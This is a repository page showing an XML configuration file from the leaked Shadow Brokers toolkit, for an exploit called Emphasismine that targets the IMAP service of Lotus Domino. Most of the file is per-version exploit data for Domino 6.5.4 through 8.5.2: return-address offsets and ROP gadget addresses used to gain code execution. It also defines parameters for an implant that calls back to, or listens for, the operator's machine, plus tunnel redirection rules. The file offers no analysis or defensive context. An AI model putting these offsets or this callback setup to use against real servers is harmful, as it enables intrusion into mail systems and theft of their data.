sneedmca/shadowbrokers-exploits
1
0
Fork 0
Code Issues Pull requests Projects Releases Packages Wiki Activity Actions
shadowbrokers-exploits/windows/exploits/Emphasismine-3.4.0.0.xml
Donncha O'Cearbhaill 7f640a83d4 Inital commit of Shadowbrokers 'Lost in Translation' release
2017-04-14 11:45:07 +02:00

892 lines
39 KiB
XML
Raw Permalink Blame History

<?xml version="1.0" encoding="UTF-8"?>
<config xmlns="urn:trch"
id="0a9ec8318c0f544ba84f56df2e5e3c278844f5bf"
name="Emphasismine"
version="3.4.0"
configversion="3.4.0.0"
schemaversion="2.0.0">
<inputparameters>
<parameter name="TargetIp" description="Target IP Address" type="IPv4"/>
<parameter name="TargetPort" description="Port used by the IMAP service" type="TcpPort">
<default>143</default>
</parameter>
<parameter name="TargetAcctUsr" type="String" description="Target account username"/>
<parameter name="TargetAcctPwd" type="String" description="Target account password"/>
<!-- All plugins that perform blocking network calls must have a NetworkTimeout parameter or its equivalent -->
<parameter name="NetworkTimeout" description="Timeout for blocking network calls (in seconds). Use -1 for no timeout." type="S16">
<default>60</default>
</parameter>
<!-- This is a template for the version-dependent input parameters -->
<paramchoice name="DominoVersion" description="The version of Lotus Domino running on the target">
<paramgroup name="6.5.4" description="">
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
<value>0x34C</value>
</parameter>
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
<value>0x00428463</value>
</parameter>
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
<value>0x0042E038</value>
</parameter>
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
<value>0x00420CF5</value>
</parameter>
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
<value>0x60132252</value>
</parameter>
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
<value>0x60951039</value>
</parameter>
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
<value>0x607112B4</value>
</parameter>
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
<value>0x60168187</value>
</parameter>
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
<value>0x600A371D</value>
</parameter>
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
<value>0x609DBEA1</value>
</parameter>
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
<value>0x0042845E</value>
</parameter>
<parameter name="RetEip" description="" type="U32" hidden="true" >
<value>0x0041331B</value>
</parameter>
</paramgroup>
<paramgroup name="6.5.5" description="">
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
<value>0x34C</value>
</parameter>
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
<value>0x004283D3</value>
</parameter>
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
<value>0x0042E038</value>
</parameter>
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
<value>0x00420C15</value>
</parameter>
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
<value>0x00427989</value>
</parameter>
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
<value>0x60984BC9</value>
</parameter>
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
<value>0x60740B94</value>
</parameter>
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
<value>0x60169917</value>
</parameter>
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
<value>0x6016B89E</value>
</parameter>
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
<value>0x60A0FCB1</value>
</parameter>
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
<value>0x004283CE</value>
</parameter>
<parameter name="RetEip" description="" type="U32" hidden="true" >
<value>0x0041323B</value>
</parameter>
</paramgroup>
<paramgroup name="6.5.5FP1" description="">
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
<value>0x34C</value>
</parameter>
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
<value>0x004283D3</value>
</parameter>
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
<value>0x0042E038</value>
</parameter>
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
<value>0x00420C15</value>
</parameter>
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
<value>0x00427989</value>
</parameter>
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
<value>0x60985499</value>
</parameter>
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
<value>0x60741404</value>
</parameter>
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
<value>0x6099F0D7</value>
</parameter>
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
<value>0x6003620D</value>
</parameter>
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
<value>0x60A108A1</value>
</parameter>
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
<value>0x004283CE</value>
</parameter>
<parameter name="RetEip" description="" type="U32" hidden="true" >
<value>0x0041323B</value>
</parameter>
</paramgroup>
<paramgroup name="7.0" description="">
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
<value>0x22C</value>
</parameter>
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
<value>0x0042a001</value>
</parameter>
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
<value>0x0043305c</value>
</parameter>
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
<value>0x0041d5a7</value>
</parameter>
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
<value>0x0042cbec</value>
</parameter>
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
<value>0x100aa91d</value>
</parameter>
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
<value>0x606f6ee4</value>
</parameter>
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
<value>0x600fa694</value>
</parameter>
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
<value>0x00429a6c</value>
</parameter>
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
<value>0x004050A7</value>
</parameter>
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
<value>0x004050AF</value>
</parameter>
<parameter name="RetEip" description="" type="U32" hidden="true" >
<value>0x00413E78</value>
</parameter>
</paramgroup>
<paramgroup name="7.0.1" description="">
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
<value>0x22C</value>
</parameter>
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
<value>0x0042Af00</value>
</parameter>
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
<value>0x0043305C</value>
</parameter>
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
<value>0x0041D5A7</value>
</parameter>
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
<value>0x0042CBEC</value>
</parameter>
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
<value>0x100AA91D</value>
</parameter>
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
<value>0x606F9364</value>
</parameter>
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
<value>0x600FA6D4</value>
</parameter>
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
<value>0x00429A6C</value>
</parameter>
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
<value>0x004050A7</value>
</parameter>
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
<value>0x004050AF</value>
</parameter>
<parameter name="RetEip" description="" type="U32" hidden="true" >
<value>0x00413E78</value>
</parameter>
</paramgroup>
<paramgroup name="7.0.2" description="">
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
<value>0x22C</value>
</parameter>
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
<value>0x0042A001</value>
</parameter>
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
<value>0x0043305C</value>
</parameter>
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
<value>0x0041D5A7</value>
</parameter>
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
<value>0x0042CB58</value>
</parameter>
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
<value>0x100AAADD</value>
</parameter>
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
<value>0x60709A24</value>
</parameter>
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
<value>0x600F8E54</value>
</parameter>
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
<value>0x00429A6C</value>
</parameter>
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
<value>0x004050A7</value>
</parameter>
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
<value>0x6001FAC1</value>
</parameter>
<parameter name="RetEip" description="" type="U32" hidden="true" >
<value>0x00413E78</value>
</parameter>
</paramgroup>
<paramgroup name="7.0.3" description="">
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
<value>0x22C</value>
</parameter>
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
<value>0x0042A091</value>
</parameter>
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
<value>0x0043305C</value>
</parameter>
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
<value>0x0041D637</value>
</parameter>
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
<value>0x0042CBE8</value>
</parameter>
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
<value>0x100AA9ED</value>
</parameter>
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
<value>0x6071E614</value>
</parameter>
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
<value>0x600F87E4</value>
</parameter>
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
<value>0x00429AFC</value>
</parameter>
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
<value>0x004050B7</value>
</parameter>
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
<value>0x004050BF</value>
</parameter>
<parameter name="RetEip" description="" type="U32" hidden="true" >
<value>0x00413F08</value>
</parameter>
</paramgroup>
<paramgroup name="7.0.3FP1" description="">
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
<value>0x22C</value>
</parameter>
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
<value>0x0042A091</value>
</parameter>
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
<value>0x0043305C</value>
</parameter>
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
<value>0x0041D637</value>
</parameter>
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
<value>0x0042CBE8</value>
</parameter>
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
<value>0x100AA9ED</value>
</parameter>
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
<value>0x6071e674</value>
</parameter>
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
<value>0x600f8824</value>
</parameter>
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
<value>0x00429AFC</value>
</parameter>
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
<value>0x004050B7</value>
</parameter>
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
<value>0x004050BF</value>
</parameter>
<parameter name="RetEip" description="" type="U32" hidden="true" >
<value>0x00413F08</value>
</parameter>
</paramgroup>
<paramgroup name="7.0.4" description="">
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
<value>0x22C</value>
</parameter>
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
<value>0x0042A271</value>
</parameter>
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
<value>0x0043305C</value>
</parameter>
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
<value>0x0041d817</value>
</parameter>
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
<value>0x0042cdde</value>
</parameter>
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
<value>0x100a9e3d</value>
</parameter>
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
<value>0x60728db4</value>
</parameter>
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
<value>0x60150da4</value>
</parameter>
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
<value>0x00429cdc</value>
</parameter>
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
<value>0x00405107</value>
</parameter>
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
<value>0x0040510f</value>
</parameter>
<parameter name="RetEip" description="" type="U32" hidden="true" >
<value>0x00413f98</value>
</parameter>
</paramgroup>
<paramgroup name="8.0" description="">
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
<value>0x22C</value>
</parameter>
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
<value>0x00429fa1</value>
</parameter>
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
<value>0x0043205c</value>
</parameter>
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
<value>0x0041d567</value>
</parameter>
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
<value>0x0042caf8</value>
</parameter>
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
<value>0x60aa7dab</value>
</parameter>
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
<value>0x60764914</value>
</parameter>
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
<value>0x60153b14</value>
</parameter>
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
<value>0x00429a12</value>
</parameter>
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
<value>0x00405067</value>
</parameter>
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
<value>0x0040506f</value>
</parameter>
<parameter name="RetEip" description="" type="U32" hidden="true" >
<value>0x00413cd8</value>
</parameter>
</paramgroup>
<paramgroup name="8.0.1" description="">
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
<value>0x22C</value>
</parameter>
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
<value>0x0042a001</value>
</parameter>
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
<value>0x0043205c</value>
</parameter>
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
<value>0x0041d5c7</value>
</parameter>
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
<value>0x0042cb58</value>
</parameter>
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
<value>0x60abf84b</value>
</parameter>
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
<value>0x60772714</value>
</parameter>
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
<value>0x601549d4</value>
</parameter>
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
<value>0x00429a72</value>
</parameter>
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
<value>0x004050b7</value>
</parameter>
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
<value>0x004050bf</value>
</parameter>
<parameter name="RetEip" description="" type="U32" hidden="true" >
<value>0x00413d38</value>
</parameter>
</paramgroup>
<paramgroup name="8.0.2" description="">
<!-- Find non-nIMAP.exe offsets -->
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
<value>0x22C</value>
</parameter>
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
<value>0x0042a001</value>
</parameter>
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
<value>0x0043205c</value>
</parameter>
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
<value>0x0041d5c7</value>
</parameter>
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
<value>0x0042cb58</value>
</parameter>
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
<value>0x60Ace7ab</value>
</parameter>
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
<value>0x6077a774</value>
</parameter>
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
<value>0x600f9b04</value>
</parameter>
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
<value>0x00429a72</value>
</parameter>
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
<value>0x004050b7</value>
</parameter>
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
<value>0x004050bf</value>
</parameter>
<parameter name="RetEip" description="" type="U32" hidden="true" >
<value>0x00413d38</value>
</parameter>
</paramgroup>
<paramgroup name="8.5" description="">
<!-- Find non-nIMAP.exe offsets -->
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
<value>0x22C</value>
</parameter>
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
<value>0x0042a361</value>
</parameter>
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
<value>0x0043305c</value>
</parameter>
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
<value>0x0042d17a</value>
</parameter>
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
<value>0x0042ceb8</value>
</parameter>
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
<value>0x60b8de5b</value>
</parameter>
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
<value>0x606068f8</value>
</parameter>
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
<value>0x600f37c4</value>
</parameter>
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
<value>0x00429dd4</value>
</parameter>
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
<value>0x004050b7</value>
</parameter>
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
<value>0x004050bf</value>
</parameter>
<parameter name="RetEip" description="" type="U32" hidden="true" >
<value>0x00414068</value>
</parameter>
</paramgroup>
<paramgroup name="8.5.1" description="">
<!-- Find non-nIMAP.exe offsets -->
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
<value>0x22C</value>
</parameter>
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
<value>0x0042b5d0</value>
</parameter>
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
<value>0x0043305C</value>
</parameter>
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
<value>0x0041db67</value>
</parameter>
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
<value>0x0042d4a0</value>
</parameter>
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
<value>0x620aa96d</value>
</parameter>
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
<value>0x60630e48</value>
</parameter>
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
<value>0x6015db64</value>
</parameter>
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
<value>0x42a146</value>
</parameter>
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
<value>0x4050a7</value>
</parameter>
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
<value>0x4050af</value>
</parameter>
<parameter name="RetEip" description="" type="U32" hidden="true" >
<value>0x4140c8</value>
</parameter>
</paramgroup>
<paramgroup name="8.5.1FP1" description="">
<!-- Find non-nIMAP.exe offsets -->
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
<value>0x22C</value>
</parameter>
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
<value>0x0042a831</value>
</parameter>
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
<value>0x0043305C</value>
</parameter>
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
<value>0x0042e761</value>
</parameter>
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
<value>0x0042d388</value>
</parameter>
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
<value>0x620aa96d</value>
</parameter>
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
<value>0x606311b8</value>
</parameter>
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
<value>0x6015dbd4</value>
</parameter>
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
<value>0x0042a2a6</value>
</parameter>
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
<value>0x004050a7</value>
</parameter>
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
<value>0x004050af</value>
</parameter>
<parameter name="RetEip" description="" type="U32" hidden="true" >
<value>0x0041413c</value>
</parameter>
</paramgroup>
<paramgroup name="8.5.1FP2" description="">
<!-- Find non-nIMAP.exe offsets -->
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
<value>0x22C</value>
</parameter>
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
<value>0x0042a831</value>
</parameter>
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
<value>0x0043305C</value>
</parameter>
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
<value>0x0042e761</value>
</parameter>
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
<value>0x0042d388</value>
</parameter>
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
<value>0x620aa96d</value>
</parameter>
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
<value>0x60631f08</value>
</parameter>
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
<value>0x6015d2d4</value>
</parameter>
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
<value>0x0042a2a6</value>
</parameter>
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
<value>0x004050a7</value>
</parameter>
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
<value>0x004050af</value>
</parameter>
<parameter name="RetEip" description="" type="U32" hidden="true" >
<value>0x0041413c</value>
</parameter>
</paramgroup>
<paramgroup name="8.5.1FP3" description="">
<!-- Find non-nIMAP.exe offsets -->
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
<value>0x22C</value>
</parameter>
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
<value>0x0042a831</value>
</parameter>
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
<value>0x0043305C</value>
</parameter>
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
<value>0x0042e761</value>
</parameter>
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
<value>0x0042d388</value>
</parameter>
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
<value>0x620aa96d</value>
</parameter>
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
<value>0x60631058</value>
</parameter>
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
<value>0x6015c0c4</value>
</parameter>
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
<value>0x0042a2a6</value>
</parameter>
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
<value>0x004050a7</value>
</parameter>
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
<value>0x004050af</value>
</parameter>
<parameter name="RetEip" description="" type="U32" hidden="true" >
<value>0x0041413c</value>
</parameter>
</paramgroup>
<paramgroup name="8.5.1FP4" description="">
<!-- Find non-nIMAP.exe offsets -->
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
<value>0x22C</value>
</parameter>
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
<value>0x0042a7d1</value>
</parameter>
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
<value>0x0043305C</value>
</parameter>
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
<value>0x0041dc67</value>
</parameter>
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
<value>0x0042d328</value>
</parameter>
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
<value>0x620aa96d</value>
</parameter>
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
<value>0x60631328</value>
</parameter>
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
<value>0x6015c284</value>
</parameter>
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
<value>0x0042a240</value>
</parameter>
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
<value>0x004050a7</value>
</parameter>
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
<value>0x004050af</value>
</parameter>
<parameter name="RetEip" description="" type="U32" hidden="true" >
<value>0x004140dc</value>
</parameter>
</paramgroup>
<paramgroup name="8.5.1FP5" description="">
<!-- Find non-nIMAP.exe offsets -->
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
<value>0x22C</value>
</parameter>
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
<value>0x0042a7d1</value>
</parameter>
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
<value>0x0043305C</value>
</parameter>
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
<value>0x0041dc67</value>
</parameter>
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
<value>0x0042d328</value>
</parameter>
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
<value>0x620aa96d</value>
</parameter>
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
<value>0x60631a78</value>
</parameter>
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
<value>0x6015c654</value>
</parameter>
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
<value>0x0042a240</value>
</parameter>
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
<value>0x004050a7</value>
</parameter>
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
<value>0x004050af</value>
</parameter>
<parameter name="RetEip" description="" type="U32" hidden="true" >
<value>0x004140dc</value>
</parameter>
</paramgroup>
<paramgroup name="8.5.2" description="">
<!-- Find non-nIMAP.exe offsets -->
<parameter name="ReturnAddrOffset" description="" type="U32" hidden="true" >
<value>0x22C</value>
</parameter>
<parameter name="AddrPopEax" description="" type="U32" hidden="true" >
<value>0x0042AA81</value>
</parameter>
<parameter name="AddrVirtualAlloc" description="" type="U32" hidden="true" >
<value>0x0043305C</value>
</parameter>
<parameter name="AddrJmpEaxPtr" description="" type="U32" hidden="true" >
<value>0x0041DF07</value>
</parameter>
<parameter name="AddrPopEdi" description="" type="U32" hidden="true" >
<value>0x0042D66C</value>
</parameter>
<parameter name="AddrEaxToEsi" description="" type="U32" hidden="true" >
<value>0x60DDE56B</value>
</parameter>
<parameter name="AddrCopyCode" description="" type="U32" hidden="true" >
<value>0x60692948</value>
</parameter>
<parameter name="AddrIncEax" description="" type="U32" hidden="true" >
<value>0x6014a394</value>
</parameter>
<parameter name="AddrJmpEax" description="" type="U32" hidden="true" >
<value>0x0042A4F2</value>
</parameter>
<parameter name="AddrSetAtEdxRet" description="" type="U32" hidden="true" >
<value>0x00405227</value>
</parameter>
<parameter name="AddrClrEaxRet" description="" type="U32" hidden="true" >
<value>0x0040522F</value>
</parameter>
<parameter name="RetEip" description="" type="U32" hidden="true" >
<value>0x004142AC</value>
</parameter>
</paramgroup>
</paramchoice>
<!-- All plugins that accept a callback must have the Callback* parameters listed below, or their equivalents. -->
<!-- Callback/Callin parameters -->
<paramchoice name="Direction" description="Callback from target or Callin to target">
<default>Callback</default>
<paramgroup name="Callback" description="Target calls back to plugin">
<parameter name="CallbackIp" description="Callback IP address" type="IPv4"/>
<parameter name="CallbackPort" description="Callback port" type="TcpPort" >
<default>0</default>
</parameter>
<parameter name="CallbackLocalPort" description="Local callback port" type="TcpPort" required="false"/>
</paramgroup>
<paramgroup name="Callin" description="Target waits for call from plugin">
<parameter name="ListenPort" description="Port the egg will listen on" type="TcpPort"/>
<parameter name="ListenLocalPort" description="Port we connect to" type="TcpPort" required ="false"/>
<parameter name="ListenWait" description="Timeout to wait before trying to connect in." type="S16">
<default>10</default>
</parameter>
</paramgroup>
</paramchoice>
</inputparameters>
<outputparameters>
<paramchoice name="Contract"
description="The contract fulfilled by this plugin">
<value>StagedUpload</value>
<paramgroup name="StagedUpload" description="">
<parameter name="ConnectedTcp"
description="The connected socket"
type="Socket"/>
<parameter name="XorMask"
description="Masking byte"
type="U8"/>
</paramgroup>
</paramchoice>
</outputparameters>
<redirection>
<!-- This is the tunnel used when we're "throwing" the exploit from the ROC -->
<local
protocol="Tcp"
listenaddr="TargetIp"
listenport="TargetPort"
destaddr="TargetIp"
destport="TargetPort"
closeoncompletion="true"/>
<!-- This is the tunnel used when we're "calling in" from the ROC to the exploited machine -->
<local
protocol="Tcp"
listenaddr="TargetIp"
listenport="ListenLocalPort"
destaddr="TargetIp"
destport="ListenPort"
closeoncompletion="false"/>
<!-- This is the tunnel we use when the exploit, after completing, "calls back" to the ROC -->
<remote
protocol="Tcp"
listenaddr="CallbackIp"
listenport="CallbackPort"
destport="CallbackLocalPort"/>
</redirection>
<logic>
<service name="imap">
<bindtopath name="TargetPort" path="//service[name='imap']/port"/>
</service>
<bindtopath name="TargetIp" path="//identifier"/>
</logic>
</config>
Reference in a new issue View git blame Copy permalink